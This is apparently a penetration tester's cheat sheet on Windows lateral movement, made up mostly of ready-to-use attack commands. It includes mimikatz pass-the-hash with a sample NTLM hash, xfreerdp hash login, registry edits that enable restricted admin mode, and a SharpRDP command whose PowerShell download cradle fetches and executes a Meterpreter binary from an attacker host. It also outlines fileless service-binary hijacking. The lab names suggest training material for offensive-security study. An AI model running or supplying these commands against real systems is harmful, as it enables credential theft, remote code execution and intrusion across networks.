Windows Lateral Movement

PreviousDNS Tunneling NextMetasploit Tunneling

Last updated 12 months ago

Windows Lateral Movement

RDP (GUI)

If we have gained access to clear text credentials for a domain user and that user is a local administrator of the target machine, we can simply use mstsc.exe (the native RDP application) to gain access to that machine.

When an RDP connection is created, the NTLM hashes will reside in memory for the duration of the session. If we happen to compromise a well-used server (like a jump server), we could dump any of those cached credentials as well.

Turn on SMB (for impacket psexec / cme/nxc)

Set-SmbServerConfiguration -EnableSMB2Protocol $true

rmb to in prior to use impacket-psexec

with Admin NTLM hash connecting to next victim

Restricted admin mode (default disabled) allows system administrators to perform a network login with RDP which does not require clear text credentials and will not store them in memory, essentially disabling single sign-on. This type of login is commonly used by service accounts.

While restricted admin mode protects against credential theft on the target, it is now possible to pass the hash when doing lateral movement with mstsc.

@windows hacked victim

privilege::debug
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"

Clicking Connect opens an RDP session on {next victim hostname} as admin, achieving lateral movement with the native RDP client in Windows with only the NTLM hash.

@kali when can reach next

xfreerdp /u:admin /pth:2892D26CDF84D7A70E2EB3B9F05C425E /v:192.168.120.6 /cert-ignore

Enable restricted admin mode

1) launch shell instance in admin user context

sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:powershell

2) shell access to next victim

Enter-PSSession -Computer {next victim hostnam

3) create the registry entry & quit session

@next victim

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Exit

#alternative way
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f

RDP Console

Use SharpRDP to execute a PowerShell download cradle on appsrv01 that pulls the Meterpreter executable and subsequently executes it with stacked commands

host shell exe in web ser, set up listner

sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=corp1\dave password=lab

Fileless (admin -> SYSTEM)

PsExec authenticates to SMB on the target host and accesses the DCE/RPC interface. PsExec will use this interface to access the service control manager, create a new service, and execute it. As part of the attack, the binary that is executed by the service is copied to the target host.

We can execute our code without registering a new service by updating the binary of an existing service and start the modified service with our target binary. Since we control the service binary, we can use a PowerShell download cradle to avoid saving a file to disk.

Lat.exe file05/dc02 SensorService “C:\temp\”